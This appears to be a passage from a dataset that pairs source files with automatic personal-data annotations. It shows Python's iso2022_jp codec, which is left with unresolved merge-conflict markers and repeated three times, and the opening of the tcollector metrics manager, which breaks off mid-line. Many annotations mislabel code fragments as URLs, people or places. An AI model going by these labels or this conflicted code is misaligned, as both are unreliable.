'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com']]" +13,"<<<<<<< HEAD +<<<<<<< HEAD +# +# iso2022_jp.py: Python Unicode Codec for ISO2022_JP +# +# Written by Hye-Shik Chang dummy@email.com +# + +import _codecs_iso2022, codecs +import _multibytecodec as mbc + +codec = _codecs_iso2022.getcodec('iso2022_jp') + +class Codec(codecs.Codec): + encode = codec.encode + decode = codec.decode + +class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, + codecs.IncrementalEncoder): + codec = codec + +class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, + codecs.IncrementalDecoder): + codec = codec + +class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): + codec = codec + +class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): + codec = codec + +def getregentry(): + return codecs.CodecInfo( + name='iso2022_jp', + encode=Codec().encode, + decode=Codec().decode, + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamreader=StreamReader, + streamwriter=StreamWriter, + ) +======= +# +# iso2022_jp.py: Python Unicode Codec for ISO2022_JP +# +# Written by Hye-Shik Chang dummy@email.com +# + +import _codecs_iso2022, codecs +import _multibytecodec as mbc + +codec = _codecs_iso2022.getcodec('iso2022_jp') + +class Codec(codecs.Codec): + encode = codec.encode + decode = codec.decode + +class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, + codecs.IncrementalEncoder): + codec = codec + +class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, + codecs.IncrementalDecoder): + codec = codec + +class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): + codec = codec + +class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): + codec = codec + +def getregentry(): + return codecs.CodecInfo( + name='iso2022_jp', + encode=Codec().encode, + decode=Codec().decode, + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamreader=StreamReader, + streamwriter=StreamWriter, + ) +>>>>>>> PI:KEY +======= +# +# iso2022_jp.py: Python Unicode Codec for ISO2022_JP +# +# Written by Hye-Shik Chang dummy@email.com +# + +import _codecs_iso2022, codecs +import _multibytecodec as mbc + +codec = _codecs_iso2022.getcodec('iso2022_jp') + +class Codec(codecs.Codec): + encode = codec.encode + decode = codec.decode + +class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, + codecs.IncrementalEncoder): + codec = codec + +class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, + codecs.IncrementalDecoder): + codec = codec + +class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): + codec = codec + +class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): + codec = codec + +def getregentry(): + return codecs.CodecInfo( + name='iso2022_jp', + encode=Codec().encode, + decode=Codec().decode, + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamreader=StreamReader, + streamwriter=StreamWriter, + ) +>>>>>>> PI:KEY +",3219,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co']]" +14,"#!/usr/bin/env python +# This file is part of tcollector. +# Copyright (C) 2010 The tcollector Authors. +# +# This program is free software: you can redistribute it and/or modify it +# under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or (at your +# option) any later version. This program is distributed in the hope that it +# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty +# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser +# General Public License for more details. You should have received a copy +# of the GNU Lesser General Public License along with this program. If not, +# see . +# +# tcollector.py +# +""""""Simple manager for collection scripts that run and gather data. + The tcollector gathers the data and sends it to the TSD for storage."""""" +# +# by Mark Smith dummy@email.com. +# + +import atexit +import errno +import fcntl +import logging +import os +import random +import re +import signal +import socket +import subprocess +import sys +import threading +import time +import json +import urllib2 +import base64 +from logging.handlers import RotatingFileHandler +from Queue import Queue +from Queue import Empty +from Queue import Full +from optparse import OptionParser + + +# global variables. +COLLECTORS = {} +GENERATION = 0 +DEFAULT_LOG = '/var/log/tcollector.log' +LOG = logging.getLogger('tcollector') +ALIVE = True +# If the SenderThread catches more than this many consecutive uncaught +# exceptions, something is not right and tcollector will shutdown. +# Hopefully some kind of supervising daemon will then restart it. +MAX_UNCAUGHT_EXCEPTIONS = 100 +DEFAULT_PORT = 4242 +MAX_REASONABLE_TIMESTAMP = 1600000000 # Good until September 2020 :) +# How long to wait for datapoints before assuming +# a collector is dead and restarting it +ALLOWED_INACTIVITY_TIME = 600 # seconds +MAX_SENDQ_SIZE = 10000 +MAX_READQ_SIZE = 100000 + + +def register_collector(collector): + """"""Register a collector with the COLLECTORS global"""""" + + assert isinstance(collector, Collector), ""collector=%r"" % (collector,) + # store it in the global list and initiate a kill for anybody with the + # same name that happens to still be hanging around + if collector.name in COLLECTORS: + col = COLLECTORS[collector.name] + if col.proc is not None: + LOG.error('%s still has a process (pid=%d) and is being reset,' + ' terminating', col.name, col.proc.pid) + col.shutdown() + + COLLECTORS[collector.name] = collector + + +class ReaderQueue(Queue): + """"""A Queue for the reader thread"""""" + + def nput(self, value): + """"""A nonblocking put, that simply logs and discards the value when the + queue is full, and returns false if we dropped."""""" + try: + self.put(value, False) + except Full: + LOG.error(""DROPPED LINE: %s"", value) + return False + return True + + +class Collector(object): + """"""A Collector is a script that is run that gathers some data + and prints it out in standard TSD format on STDOUT. This + class maintains all of the state information for a given + collector and gives us utility methods for working with + it."""""" + + def __init__(self, colname, interval, filename, mtime=0, lastspawn=0): + """"""Construct a new Collector."""""" + self.name = colname + self.interval = interval + self.filename = filename + self.lastspawn = lastspawn + self.proc = None + self.nextkill = 0 + self.killstate = 0 + self.dead = False + self.mtime = mtime + self.generation = GENERATION + self.buffer = """" + self.datalines = [] + # Maps (metric, tags) to (value, repeated, line, timestamp) where: + # value: Last value seen. + # repeated: boolean, whether the last value was seen more than once. + # line: The last line that was read from that collector. + # timestamp: Time at which we saw the value for the first time. + # This dict is used to keep track of and remove duplicate values. + # Since it might grow unbounded (in case we see many different + # combinations of metrics and tags) someone needs to regularly call + # evict_old_keys() to remove old entries. + self.values = {} + self.lines_sent = 0 + self.lines_received = 0 + self.lines_invalid = 0 + self.last_datapoint = int(time.time()) + + def read(self): + """"""Read bytes from our subprocess and store them in our temporary + line storage buffer. This needs to be non-blocking."""""" + + # we have to use a buffer because sometimes the collectors + # will write out a bunch of data points at one time and we + # get some weird sized chunk. This read call is non-blocking. + + # now read stderr for log messages, we could buffer here but since + # we're just logging the messages, I don't care to + try: + out = self.proc.stderr.read() + if out: + LOG.debug('reading %s got %d bytes on stderr', + self.name, len(out)) + for line in out.splitlines(): + LOG.warning('%s: %s', self.name, line) + except IOError, (err, msg): + if err != errno.EAGAIN: + raise + except: + LOG.exception('uncaught exception in stderr read') + + # we have to use a buffer because sometimes the collectors will write + # out a bunch of data points at one time and we get some weird sized + # chunk. This read call is non-blocking. + try: + self.buffer += self.proc.stdout.read() + if len(self.buffer): + LOG.debug('reading %s, buffer now %d bytes', + self.name, len(self.buffer)) + except IOError, (err, msg): + if err != errno.EAGAIN: + raise + except AttributeError: + # sometimes the process goes away in another thread and we don't + # have it anymore, so log an error and bail + LOG.exception('caught exception, collector process went away while reading stdout') + except: + LOG.exception('uncaught exception in stdout read') + return + + # iterate for each line we have + while self.buffer: + idx = self.buffer.find('\n') + if idx == -1: + break + + # one full line is now found and we can pull it out of the buffer + line = self.buffer[0:idx].strip() + if line: + self.datalines.append(line) + self.last_datapoint = int(time.time()) + self.buffer = self.buffer[idx+1:] + + def collect(self): + """"""Reads input from the collector and returns the lines up to whomever + is calling us. This is a generator that returns a line as it + becomes available."""""" + + while self.proc is not None: + self.read() + if not len(self.datalines): + return + while len(self.datalines): + yield self.datalines.pop(0) + + def shutdown(self): + """"""Cleanly shut down the collector"""""" + + if not self.proc: + return + try: + if self.proc.poll() is None: + kill(self.proc) + for attempt in range(5): + if self.proc.poll() is not None: + return + LOG.info('Waiting %ds for PID %d (%s) to exit...' + % (5 - attempt, self.proc.pid, self.name)) + time.sleep(1) + kill(self.proc, signal.SIGKILL) + self.proc.wait() + except: + # we really don't want to die as we're trying to exit gracefully + LOG.exception('ignoring uncaught exception while shutting down') + + def evict_old_keys(self, cut_off): + """"""Remove old entries from the cache used to detect duplicate values. + + Args: + cut_off: A UNIX timestamp. Any value that's older than this will be + removed from the cache. + """""" + for key in self.values.keys(): + time = self.values[key][3] + if time < cut_off: + del self.values[key] + + +class StdinCollector(Collector): + """"""A StdinCollector simply reads from STDIN and provides the + data. This collector presents a uniform interface for the + ReaderThread, although unlike a normal collector, read()/collect() + will be blocking."""""" + + def __init__(self): + super(StdinCollector, self).__init__('stdin', 0, '') + + # hack to make this work. nobody else will rely on self.proc + # except as a test in the stdin mode. + self.proc = True + + def read(self): + """"""Read lines from STDIN and store them. We allow this to + be blocking because there should only ever be one + StdinCollector and no normal collectors, so the ReaderThread + is only serving us and we're allowed to block it."""""" + + global ALIVE + line = sys.stdin.readline() + if line: + self.datalines.append(line.rstrip()) + else: + ALIVE = False + + + def shutdown(self): + + pass + + +class ReaderThread(threading.Thread): + """"""The main ReaderThread is responsible for reading from the collectors + and assuring that we always read from the input no matter what. + All data read is put into the self.readerq Queue, which is + consumed by the SenderThread."""""" + + def __init__(self, dedupinterval, evictinterval): + """"""Constructor. + Args: + dedupinterval: If a metric sends the same value over successive + intervals, suppress sending the same value to the TSD until + this many seconds have elapsed. This helps graphs over narrow + time ranges still see timeseries with suppressed datapoints. + evictinterval: In order to implement the behavior above, the + code needs to keep track of the last value seen for each + combination of (metric, tags). Values older than + evictinterval will be removed from the cache to save RAM. + Invariant: evictinterval > dedupinterval + """""" + assert evictinterval > dedupinterval, ""%r <= %r"" % (evictinterval, + dedupinterval) + super(ReaderThread, self).__init__() + + self.readerq = ReaderQueue(MAX_READQ_SIZE) + self.lines_collected = 0 + self.lines_dropped = 0 + self.dedupinterval = dedupinterval + self.evictinterval = evictinterval + + def run(self): + """"""Main loop for this thread. Just reads from collectors, + does our input processing and de-duping, and puts the data + into the queue."""""" + + LOG.debug(""ReaderThread up and running"") + + lastevict_time = 0 + # we loop every second for now. ideally we'll setup some + # select or other thing to wait for input on our children, + # while breaking out every once in a while to setup selects + # on new children. + while ALIVE: + for col in all_living_collectors(): + for line in col.collect(): + self.process_line(col, line) + + if self.dedupinterval != 0: # if 0 we do not use dedup + now = int(time.time()) + if now - lastevict_time > self.evictinterval: + lastevict_time = now + now -= self.evictinterval + for col in all_collectors(): + col.evict_old_keys(now) + + # and here is the loop that we really should get rid of, this + # just prevents us from spinning right now + time.sleep(1) + + def process_line(self, col, line): + """"""Parses the given line and appends the result to the reader queue."""""" + + self.lines_collected += 1 + + col.lines_received += 1 + if len(line) >= 1024: # Limit in net.opentsdb.tsd.PipelineFactory + LOG.warning('%s line too long: %s', col.name, line) + col.lines_invalid += 1 + return + parsed = re.match('^([-_./a-zA-Z0-9]+)\s+' # Metric name. + '(\d+\.?\d+)\s+' # Timestamp. + '(\S+?)' # Value (int or float). + '((?:\s+[-_./a-zA-Z0-9]+=[-_./a-zA-Z0-9]+)*)$', # Tags + line) + if parsed is None: + LOG.warning('%s sent invalid data: %s', col.name, line) + col.lines_invalid += 1 + return + metric, timestamp, value, tags = parsed.groups() + timestamp = int(timestamp) + + # If there are more than 11 digits we're dealing with a timestamp + # with millisecond precision + if len(str(timestamp)) > 11: + global MAX_REASONABLE_TIMESTAMP + MAX_REASONABLE_TIMESTAMP = MAX_REASONABLE_TIMESTAMP * 1000 + + # De-dupe detection... To reduce the number of points we send to the + # TSD, we suppress sending values of metrics that don't change to + # only once every 10 minutes (which is also when TSD changes rows + # and how much extra time the scanner adds to the beginning/end of a + # graph interval in order to correctly calculate aggregated values). + # When the values do change, we want to first send the previous value + # with what the timestamp was when it first became that value (to keep + # slopes of graphs correct). + # + if self.dedupinterval != 0: # if 0 we do not use dedup + key = (metric, tags) + if key in col.values: + # if the timestamp isn't > than the previous one, ignore this value + if timestamp <= col.values[key][3]: + LOG.error(""Timestamp out of order: metric=%s%s,"" + "" old_ts=%d >= new_ts=%d - ignoring data point"" + "" (value=%r, collector=%s)"", metric, tags, + col.values[key][3], timestamp, value, col.name) + col.lines_invalid += 1 + return + elif timestamp >= MAX_REASONABLE_TIMESTAMP: + LOG.error(""Timestamp is too far out in the future: metric=%s%s"" + "" old_ts=%d, new_ts=%d - ignoring data point"" + "" (value=%r, collector=%s)"", metric, tags, + col.values[key][3], timestamp, value, col.name) + return + + # if this data point is repeated, store it but don't send. + # store the previous timestamp, so when/if this value changes + # we send the timestamp when this metric first became the current + # value instead of the last. Fall through if we reach + # the dedup interval so we can print the value. + if (col.values[key][0] == value and + (timestamp - col.values[key][3] < self.dedupinterval)): + col.values[key] = (value, True, line, col.values[key][3]) + return + + # we might have to append two lines if the value has been the same + # for a while and we've skipped one or more values. we need to + # replay the last value we skipped (if changed) so the jumps in + # our graph are accurate, + if ((col.values[key][1] or + (timestamp - col.values[key][3] >= self.dedupinterval)) + and col.values[key][0] != value): + col.lines_sent += 1 + if not self.readerq.nput(col.values[key][2]): + self.lines_dropped += 1 + + # now we can reset for the next pass and send the line we actually + # want to send + # col.values is a dict of tuples, with the key being the metric and + # tags (essentially the same as wthat TSD uses for the row key). + # The array consists of: + # [ the metric's value, if this value was repeated, the line of data, + # the value's timestamp that it last changed ] + col.values[key] = (value, False, line, timestamp) + + col.lines_sent += 1 + if not self.readerq.nput(line): + self.lines_dropped += 1 + + +class SenderThread(threading.Thread): + """"""The SenderThread is responsible for maintaining a connection + to the TSD and sending the data we're getting over to it. This + thread is also responsible for doing any sort of emergency + buffering we might need to do if we can't establish a connection + and we need to spool to disk. That isn't implemented yet."""""" + + def __init__(self, reader, dryrun, hosts, self_report_stats, tags, + reconnectinterval=0, http=False, http_username=None, + http_password=None, ssl=False, maxtags=8): + """"""Constructor. + + Args: + reader: A reference to a ReaderThread instance. + dryrun: If true, data points will be printed on stdout instead of + being sent to the TSD. + hosts: List of (host, port) tuples defining list of TSDs + self_report_stats: If true, the reader thread will insert its own + stats into the metrics reported to TSD, as if those metrics had + been read from a collector. + http: A boolean that controls whether or not the http endpoint is used. + ssl: A boolean that controls whether or not the http endpoint uses ssl. + tags: A dictionary of tags to append for every data point. + """""" + super(SenderThread, self).__init__() + + self.dryrun = dryrun + self.reader = reader + self.tags = sorted(tags.items()) # dictionary transformed to list + self.http = http + self.http_username = http_username + self.http_password = http_password + self.ssl = ssl + self.hosts = hosts # A list of (host, port) pairs. + # Randomize hosts to help even out the load. + random.shuffle(self.hosts) + self.blacklisted_hosts = set() # The 'bad' (host, port) pairs. + self.current_tsd = -1 # Index in self.hosts where we're at. + self.host = None # The current TSD host we've selected. + self.port = None # The port of the current TSD. + self.tsd = None # The socket connected to the aforementioned TSD. + self.last_verify = 0 + self.reconnectinterval = reconnectinterval # in seconds. + self.time_reconnect = 0 # if reconnectinterval > 0, used to track the time. + self.sendq = [] + self.self_report_stats = self_report_stats + self.maxtags = maxtags # The maximum number of tags TSD will accept. + + def pick_connection(self): + """"""Picks up a random host/port connection."""""" + # Try to get the next host from the list, until we find a host that + # isn't in the blacklist, or until we run out of hosts (i.e. they + # are all blacklisted, which typically happens when we lost our + # connectivity to the outside world). + for self.current_tsd in xrange(self.current_tsd + 1, len(self.hosts)): + hostport = self.hosts[self.current_tsd] + if hostport not in self.blacklisted_hosts: + break + else: + LOG.info('No more healthy hosts, retry with previously blacklisted') + random.shuffle(self.hosts) + self.blacklisted_hosts.clear() + self.current_tsd = 0 + hostport = self.hosts[self.current_tsd] + self.host, self.port = hostport + LOG.info('Selected connection: %s:%d', self.host, self.port) + + def blacklist_connection(self): + """"""Marks the current TSD host we're trying to use as blacklisted. + + Blacklisted hosts will get another chance to be elected once there + will be no more healthy hosts."""""" + # FIXME: Enhance this naive strategy. + LOG.info('Blacklisting %s:%s for a while', self.host, self.port) + self.blacklisted_hosts.add((self.host, self.port)) + + def run(self): + """"""Main loop. A simple scheduler. Loop waiting for 5 + seconds for data on the queue. If there's no data, just + loop and make sure our connection is still open. If there + is data, wait 5 more seconds and grab all of the pending data and + send it. A little better than sending every line as its + own packet."""""" + + errors = 0 # How many uncaught exceptions in a row we got. + while ALIVE: + try: + self.maintain_conn() + try: + line = self.reader.readerq.get(True, 5) + except Empty: + continue + self.sendq.append(line) + time.sleep(5) # Wait for more data + while True: + # prevents self.sendq fast growing in case of sending fails + # in send_data() + if len(self.sendq) > MAX_SENDQ_SIZE: + break + try: + line = self.reader.readerq.get(False) + except Empty: + break + self.sendq.append(line) + + if ALIVE: + self.send_data() + errors = 0 # We managed to do a successful iteration. + except (ArithmeticError, EOFError, EnvironmentError, LookupError, + ValueError), e: + errors += 1 + if errors > MAX_UNCAUGHT_EXCEPTIONS: + shutdown() + raise + LOG.exception('Uncaught exception in SenderThread, ignoring') + time.sleep(1) + continue + except: + LOG.exception('Uncaught exception in SenderThread, going to exit') + shutdown() + raise + + def verify_conn(self): + """"""Periodically verify that our connection to the TSD is OK + and that the TSD is alive/working."""""" + # http connections don't need this + if self.http: + return True + + if self.tsd is None: + return False + + # if the last verification was less than a minute ago, don't re-verify + if self.last_verify > time.time() - 60: + return True + + # in case reconnect is activated, check if it's time to reconnect + if self.reconnectinterval > 0 and self.time_reconnect < time.time() - self.reconnectinterval: + # closing the connection and indicating that we need to reconnect. + try: + self.tsd.close() + except socket.error, msg: + pass # not handling that + self.time_reconnect = time.time() + return False + + # we use the version command as it is very low effort for the TSD + # to respond + LOG.debug('verifying our TSD connection is alive') + try: + self.tsd.sendall('version\n') + except socket.error, msg: + self.tsd = None + self.blacklist_connection() + return False + + bufsize = 4096 + while ALIVE: + # try to read as much data as we can. at some point this is going + # to block, but we have set the timeout low when we made the + # connection + try: + buf = self.tsd.recv(bufsize) + except socket.error, msg: + self.tsd = None + self.blacklist_connection() + return False + + # If we don't get a response to the `version' request, the TSD + # must be dead or overloaded. + if not buf: + self.tsd = None + self.blacklist_connection() + return False + + # Woah, the TSD has a lot of things to tell us... Let's make + # sure we read everything it sent us by looping once more. + if len(buf) == bufsize: + continue + + # If everything is good, send out our meta stats. This + # helps to see what is going on with the tcollector. + # TODO need to fix this for http + if self.self_report_stats: + strs = [ + ('reader.lines_collected', + '', self.reader.lines_collected), + ('reader.lines_dropped', + '', self.reader.lines_dropped) + ] + + for col in all_living_collectors(): + strs.append(('collector.lines_sent', 'collector=' + + col.name, col.lines_sent)) + strs.append(('collector.lines_received', 'collector=' + + col.name, 